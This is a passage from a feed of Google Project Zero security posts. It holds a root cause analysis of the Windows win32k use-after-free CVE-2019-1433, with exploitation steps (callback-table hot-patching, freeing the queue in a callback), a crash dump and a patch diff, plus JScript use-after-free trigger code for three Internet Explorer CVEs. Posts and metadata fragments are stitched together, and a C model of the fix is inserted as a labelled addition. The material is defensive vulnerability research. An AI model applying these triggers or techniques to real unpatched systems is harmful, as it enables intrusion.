    if ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) {
[...]
```

#### USER-MODE CALLBACK in xxxMoveSwitchWndHilite

There are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.

This call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.

xxxMoveSwitchWndHilite sends message 0x8C, which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it’s not expected that user applications will respond to this message.
Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented [here](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>).

In the callback, we free the tagQ structure using [AttachThreadInput](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-attachthreadinput>). AttachThreadInput “attaches the input processing mechanism of one thread to that of another thread” and to do this, it destroys the queue of the thread that is being attached to another thread’s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now-freed queue:

 1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we’ll loop back to the top of the while loop.

 2. Once we’re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go into the else block, or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn’t work because this window is a special system class (fnid == 0x2A0).
Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.

```c
if ( (gspwndAltTab->fnid & 0x3FFF) == 0x2A0 &&
     gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&
     gspwndAltTab->bDestroyed == 0 )
    v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);
else
    v45 = 0i64;
```

### USING THE FREED QUEUE

Once v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer, so we dereference it and move it into r14. Therefore we now have a use-after-free.

## WINDOWS 10

CVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.

Vulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)

Patched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)

I confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.

```
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.

FAULTING_IP:
win32kfull!xxxNextWindow+743
ffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h]

 # Child-SP          RetAddr           Call Site
00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus
01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12
02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952
03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107
04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933
05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f
06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360
07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 ← UAF
08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005
09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b
0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5
0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5
0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab
0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4
0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3
0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d
10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25
11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14
12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 <- My POC
13 0000002b`2a5ffc10 00007ffb`7f86ced1 KERNEL32!BaseThreadInitThunk+0x14
14 0000002b`2a5ffc40 00000000`00000000 ntdll!RtlUserThreadStart+0x21

BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
```

To trigger the crash, I only had to change two things in
the Windows 7 POC:

 1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch window). It is possible to do this programmatically, I just didn’t take the time to code it up.

 2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.

It took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run).

![Side by side: Disassembly at xxxNextWindow+737 in Oct 2019 Update | Disassembly at xxxNextWindow+73F in Nov 2019 Update](<https://1.bp.blogspot.com/-DD9YxDSuvMo/Xpto6z2kcgI/AAAAAAAAPh8/Fl0ZjWF3vP4BGzmFhGrFkWBk_QKLfAhZwCNcBGAsYHQ/s1600/8_SidebySideDisasm2%2B%25281%2529.png>)

The fix in the November update for Windows 10 1903 is the same as the Windows 7 fix:

 * Add the UnlockQueue function.

 * Add locking around the call to xxxNextWindow.

 * Check the “destroyed” bitflag in the tagQ struct before proceeding to use the queue.

# FIXING THE VULNERABILITY

To patch the CVE-2019-1433 vulnerability, Microsoft changed four functions:

 * xxxNextWindow

 * xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)

 * zzzDestroyQueue

 * UnlockQueue (new function)

Overall, the changes are to prevent the queue structure from being freed and to track whether something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects.

## zzzDestroyQueue Patch

The only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags.
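As an added illustration (not the post's code and not Microsoft's), the C program below models the fix listed above in user space: xxxKeyEvent takes a lock (cLockCount) around the call that reaches user mode, zzzDestroyQueue defers the free and sets a bit in QF_flags when the queue is locked, UnlockQueue performs the deferred free, and xxxNextWindow tests that bit before the use that was at LABEL_106. The struct layout, the QF_DESTROYED name and the freed field are assumptions of the model; bit 0x1A is the bit Microsoft's patched xxxNextWindow tests.

```c
/* Model of the CVE-2019-1433 fix. Added example, not win32k code: the names
 * follow the post, the bodies are a simplified reconstruction. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Bit 0x1A of tagQ.QF_flags is what the patched xxxNextWindow tests;
 * the name QF_DESTROYED is an assumption. */
#define QF_DESTROYED (1u << 0x1A)

typedef struct tagQ {
    int      cLockCount;   /* thread-lock reference count */
    unsigned QF_flags;
    bool     freed;        /* model only: lets the harness detect a UAF */
    int      spwndActive;  /* stands in for the pointer read at LABEL_106 */
} tagQ;

/* What AttachThreadInput ends up doing to the queue. Only the patched
 * build records the deferred destruction in QF_flags. */
static void zzzDestroyQueue(tagQ *q, bool patched) {
    if (q->cLockCount > 0) {
        if (patched)
            q->QF_flags |= QF_DESTROYED;   /* freed later, in UnlockQueue */
        return;
    }
    q->freed = true;                       /* real code: frees the allocation */
}

/* New function introduced by the patch: drop the reference and complete
 * a destruction that was deferred while the queue was locked. */
static void UnlockQueue(tagQ *q) {
    if (--q->cLockCount == 0 && (q->QF_flags & QF_DESTROYED))
        q->freed = true;
}

/* The user-mode callback is injected so both builds see the same scenario. */
typedef void (*usermode_cb)(tagQ *q, bool patched);

/* Returns true if the queue was touched after being freed (the bug). */
static bool xxxNextWindow(tagQ *queue, usermode_cb cb, bool patched) {
    cb(queue, patched);                            /* xxxMoveSwitchWndHilite */
    if (patched && (queue->QF_flags & QF_DESTROYED))
        return false;                              /* bt/jb: queue is gone, exit */
    /* LABEL_106: use of the queue without verification */
    volatile int sink = queue->spwndActive;
    (void)sink;
    return queue->freed;
}

static bool xxxKeyEvent(tagQ *queue, usermode_cb cb, bool patched) {
    if (!patched)
        return xxxNextWindow(queue, cb, patched);  /* no lock: vulnerable */
    ++queue->cLockCount;                           /* thread lock the queue */
    bool uaf = xxxNextWindow(queue, cb, patched);
    UnlockQueue(queue);
    return uaf;
}

/* Callback that destroys the queue from user mode, as the post describes. */
static void destroy_in_callback(tagQ *q, bool patched) {
    zzzDestroyQueue(q, patched);
}

/* Runs the key-event path against one build; true means a UAF occurred. */
bool run_scenario(bool patched) {
    tagQ q;
    memset(&q, 0, sizeof q);
    return xxxKeyEvent(&q, destroy_in_callback, patched);
}

/* On the patched build the destruction must still complete, at unlock time. */
bool patched_frees_on_unlock(void) {
    tagQ q;
    memset(&q, 0, sizeof q);
    xxxKeyEvent(&q, destroy_in_callback, true);
    return q.freed && q.cLockCount == 0;
}

int main(void) {
    printf("vulnerable build: uaf=%d\n", run_scenario(false));   /* 1 */
    printf("patched build:    uaf=%d\n", run_scenario(true));    /* 0 */
    printf("deferred free done: %d\n", patched_frees_on_unlock()); /* 1 */
    return 0;
}
```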
![zzzDestroyQueue Pre-Patch](<https://1.bp.blogspot.com/-AfAFuVQf9ik/Xpto7GVoiTI/AAAAAAAAPiA/gHmTpfZvZRYzVnJsQgfaYrzLKBPHbSuZQCNcBGAsYHQ/s1600/9_DestroyQueueBindiff%2B%25281%2529.png>)

![zzzDestroyQueue Post-Patch](<https://1.bp.blogspot.com/-fqYi_u0Zxw8/Xpto7V4HOoI/AAAAAAAAPiE/Hu_tMFWdhnAMbn0CaOd4K_579uEBwQJMgCNcBGAsYHQ/s1600/A_DestroyQueueBindiff%25232%2B%25281%2529.png>)

## xxxNextWindow Patch

There is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added at xxxNextWindow+0x847 are as follows, where rbp is the pointer to the tagQ structure.

```
bt dword ptr [rbp+13Ch], 1Ah
jb loc_FFFFF9600017A0C9
```

If the bit is set, the function exits. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base, as described in the section above.

![xxxNextWindow Changes](<https://1.bp.blogspot.com/-BGo0hE2WvZE/Xpto7nBs7XI/AAAAAAAAPiI/hWcK8Db2YZ8yAtB4EOL_R0cHJtxfD-wEACNcBGAsYHQ/s1600/B_xxxNextWindowChanges%2B%25281%2529.png>)

## xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch

In this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10.

The change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn’t appear to be publicly documented by Microsoft.
My understanding comes from Tarjei Mandt’s 2011 Blackhat USA presentation, “[Kernel Attacks through User-Mode Callbacks](<https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf>)”. Thread locking is where objects are added to a thread’s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread.

The new function, UnlockQueue, is used to unlock the queue.

```c
if ( !queue )
    queue = gptiRit->pq;
xxxNextWindow(queue, vkey_cp);
```

xxxKeyEvent+92E Pre-Patch

```c
if ( !queue )
    queue = gptiRit->pq;
++queue->cLockCount;                                          // take a reference on the queue
currWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);
threadLockW32 = currWin32Thread->ptlW32;
currWin32Thread->ptlW32 = (_TL *)&threadLockW32;              // push the entry onto the thread's lock list
queueCp = queue;
unlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;
xxxNextWindow(queue, vkey_cp);
currWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);
currWin32Thread2->ptlW32 = threadLockW32;                     // pop the lock list entry
unlockQueueFnPtr(queueCp);                                    // UnlockQueue: drop the reference
```

xxxKeyEvent+94E Post-Patch

# CONCLUSION

So... I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl [here](<https://github.com/piotrflorczyk/cve-2019-1458_POC>).

If I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn’t have analyzed the wrong bug.
This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn’t get updates every single month. Now I know not only to rely on Windows Update, but also to look for KB articles, and that I can download additional updates from the Microsoft Update Catalog.

Although this blog post didn’t turn out how I originally planned, I decided to share it in the hope that it’d encourage others to explore a platform new to them. It’s often not a straight path, but if you’re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!

I didn’t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing experience but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit.
Therefore, I think that three weeks can be used as an approximate upper bound, since most attackers looking to use this technique will have more experience.

Source: “TFW you get really excited you patch-diffed a 0day used in the wild but then find out it is the wrong vuln”, Google Project Zero, published 2020-04-02, <https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html>

# Posted by Maddie Stone, Project Zero

When a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day.

Our effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we’re publishing some in bulk now to play “catch-up”, in the future we plan to post each one in a timely manner after it’s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and take action.

We’ve added a new column to the [“0day In the Wild” tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) that will link to any RCAs that we publish.
We will also continue to update the following page on our blog as we publish additional RCAs.\n\n** \n**\n\n[0-Day Exploit Root Cause Analyses](<https://googleprojectzero.blogspot.com/p/rca.html>)\n\n** \n**\n\nFor each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we\u2019d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our [template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) and publish this information about 0-days they detect and/or analyze! \n\n** \n**\n\nWhen completing a root cause analysis we focus on the following areas.\n\n * Bug class\n\n * Details of the vulnerability, such as how to trigger, what it allows, etc.\n\n * Exploit method and whether or not it\u2019s a known method\n\n * Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)\n\n * Any historical, present, and future bug context such as previous related bugs\n\n * Areas for variant analysis and any found variants\n\n * Structural improvements\n\n * Can you also kill the entire bug class?\n\n * Is there a way to make it much harder to exploit?\n\n * Potential detection methods for similar 0-days\n\n * Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from \u201cindicators of compromise\u201d because we\u2019re focusing on detecting while it\u2019s still a 0-day.\n\n** \n**\n\nWe selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited. 
Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.\n\nOut of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we\u2019re publishing here today. These cover 5 of the 6 0-days detected in August 2019 or later (when I joined the team and started this initiative). In addition, we\u2019re publishing the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with [Google's Threat Analysis Group](<https://blog.google/threat-analysis-group>), and a Firefox 0-day that Project Zero had reported to Mozilla and that was also discovered independently in-the-wild.\n\n * [CVE-2019-7286](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7286.html>): iOS use-after-free in CFPrefsDaemon\n\n * [CVE-2019-7287](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7287.html>): iOS buffer overflow in ProvInfoIOKitUserClient\n\n * [CVE-2019-11707](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-11707.html>): Firefox type confusion in Array.pop\n\n * [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>): JScript use-after-free in Internet Explorer\n\n * [CVE-2019-2215](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-2215.html>): Android use-after-free in Binder\n\n * [CVE-2019-13720](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-13720.html>): Chrome 
use-after-free in webaudio\n\n * CVE-2019-1429: JScript use-after-free in Internet Explorer (see [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>))\n\n * [CVE-2019-1458](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html>): Windows win32k uninitialized variable in task switching\n\nThese RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers.\n\nOur hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming and more difficult for attackers to use 0-days in the wild. Please [reach out](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0&range=A18>) with any feedback and/or suggestions and we hope that others will also begin publishing information from the [RCA template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) in the future.\n", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "href": "https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html", "type": "googleprojectzero", "title": "\nRoot Cause Analyses for 0-day In-the-Wild Exploits\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T19:27:43", "bulletinFamily": "info", "cvelist": ["CVE-2014-9665", "CVE-2015-0093", "CVE-2015-0993", "CVE-2018-8653", "CVE-2019-0880", "CVE-2019-1367", "CVE-2019-13674", "CVE-2019-13695", "CVE-2019-13764", "CVE-2019-1429", "CVE-2019-5870", "CVE-2020-0674", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-15999", "CVE-2020-17008", "CVE-2020-27930", "CVE-2020-6383", "CVE-2020-6572", "CVE-2020-6820", 
"CVE-2021-1648"], "description": "A Year in Review of 0-days Exploited In-The-Wild in 2020\n\nPosted by Maddie Stone, Project Zero\n\n2020 was a year full of 0-day exploits. Many of the Internet\u2019s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches \u2014 patches that don\u2019t correctly and comprehensively fix the root cause of a vulnerability \u2014 allow attackers to use 0-days against users with less effort.\n\nSince mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero\u2019s mission has been to \u201cmake 0-day hard\u201d. From that came the goal of our in-the-wild program: \u201cLearn from 0-days exploited in-the-wild in order to make 0-day hard.\u201d In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public\u2019s understanding of 0-day exploitation is only helpful when it doesn\u2019t diverge from the \u201cprivate state-of-the-art\u201d, what attackers are doing and are capable of. \n\nOver the last 18 months, we\u2019ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. 
[For the 2nd year in a row](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we\u2019re publishing a \u201cYear in Review\u201d report of the previous year\u2019s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in each individual exploit\u2019s analysis, please check out our[ root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>). \n\nWhen looking at the 24 0-days detected in-the-wild in 2020, there\u2019s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days.\n\nA correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we\u2019re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.\n\nWhile the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. 
If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.\n\n# This vulnerability looks familiar \ud83e\udd14\n\nAs stated in the introduction, 2020 included 0-day exploits that are similar to ones we\u2019ve seen before. Six of the 24 0-day exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits needed only a line or two of code changed to become a new working 0-day exploit. This section explains how each of these six actively exploited 0-days is related to a previously seen vulnerability. We\u2019re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it\u2019s much easier to then exploit another.\n\nProduct | Vulnerability exploited in-the-wild | Variant of...\n---|---|---\nMicrosoft Internet Explorer | CVE-2020-0674 | CVE-2018-8653*, CVE-2019-1367*, CVE-2019-1429*\nMozilla Firefox | CVE-2020-6820 | Mozilla [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>)\nGoogle Chrome | CVE-2020-6572 | CVE-2019-5870, CVE-2019-13695\nMicrosoft Windows | CVE-2020-0986 | CVE-2019-0880*\nGoogle Chrome/Freetype | CVE-2020-15999 | CVE-2014-9665\nApple Safari | CVE-2020-27930 | CVE-2015-0093\n\n* vulnerability was also exploited in-the-wild in previous years\n\n## Internet Explorer JScript CVE-2020-0674\n\nCVE-2020-0674 is the fourth vulnerability that\u2019s been exploited in this bug class in two years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the [2019 year-in-review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) we devoted a section to these vulnerabilities. 
[Google\u2019s Threat Analysis Group attributed](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>) all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.\n\nJScript is the legacy Javascript engine in Internet Explorer. While it\u2019s legacy, [by default it is still enabled](<https://support.microsoft.com/en-us/topic/option-to-disable-jscript-execution-in-internet-explorer-9e3b5ab3-8115-4650-f3d8-e496e7f8e40e>) in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I\u2019ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.\n\n### CVE-2018-8653\n\nIn December 2018, it was discovered that [CVE-2018-8653](<https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653>) was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a [write-up going through each step of this exploit](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/>). \n\nvar objs = new Array();\n\nvar refs = new Array();\n\nvar dummyObj = new Object();\n\nfunction getFreeRef()\n\n{\n\n// 5. 
delete prototype objects as well as ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = 1;\n\n}\n\nCollectGarbage();\n\nfor ( var i = 0; i < 200; i++ )\n\n{\n\nrefs[i].prototype = 1;\n\n}\n\n// 6. Garbage collector frees unused variable blocks.\n\n// This includes the one holding the \"this\" variable\n\nCollectGarbage();\n\n// 7. Boom\n\nalert(this);\n\n}\n\n// 1. create \"special\" objects for which isPrototypeOf can be invoked\n\nfor ( var i = 0; i < 200; i++ ) {\n\nvar arr = new Array({ prototype: {} });\n\nvar e = new Enumerator(arr);\n\nrefs[i] = e.item();\n\n}\n\n// 2. create a bunch of ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = new Object();\n\n}\n\n// 3. create objects to serve as prototypes and set up callbacks\n\nfor ( var i = 0; i < 200; i++ ) {\n\nrefs[i].prototype = {};\n\nrefs[i].prototype.isPrototypeOf = getFreeRef;\n\n}\n\n// 4. calls isPrototypeOf. This sets up refs[100].prototype as \"this\" variable\n\n// During callback, the \"this\" variable won't be tracked by the Garbage collector\n\n// use different index if this doesn't work\n\ndummyObj instanceof refs[100]; \n \n--- \n \n### CVE-2019-1367\n\nIn September 2019, [CVE-2019-1367](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1367>) was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... 
\n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2019-1429\n\nThe CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied! \n\nIn November 2019, Microsoft released another patch to address this gap. [CVE-2019-1429](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1429>) addressed the shortcomings of the CVE-2019-1367 patch and also fixed a variant. [The variant](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>) is that the variables in the arguments array are not tracked by the garbage collector in the toJSON callback rather than the Array.sort callback. The only difference between the two triggers is the lines marked + and - below: instead of calling the Array.sort callback, we call the toJSON callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JScript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n+ // 1. Cause toJSON callback to fire\n\n+ var o = {toJSON:F}\n\n+ JSON.stringify(o);\n\n- // 1. 
